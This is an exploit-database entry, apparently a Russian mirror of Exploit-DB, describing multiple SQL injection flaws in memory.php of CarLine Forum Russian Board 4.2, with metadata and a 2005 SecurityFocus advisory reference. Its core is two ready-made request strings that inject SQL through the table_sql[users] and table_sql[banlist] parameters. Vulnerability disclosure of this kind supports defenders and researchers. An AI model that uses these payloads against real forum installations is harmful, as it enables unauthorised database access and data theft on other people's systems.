Exploit CarLine Forum Russian Board 4.2 - 'memory.php' Multiple SQL Injections

[Exploiter]

EDB-ID

25892

Проверка EDB

1. Пройдено

Автор

1DT.W0LF

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

null

Дата публикации

2005-06-23

source: https://www.securityfocus.com/bid/14045/info
               
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
               
Forum Russian Board 4.2 is reported to be affected. 

memory.php?board_user_cook=1&board_user_id=1&board_user_passw=1&table_sql[users]=[SQL]
memory.php?board_user_cook=1&board_user_id=1&board_user_passw=1&table_sql[users]=[DB].[TBL]&table_sql[banlist]=[SQL]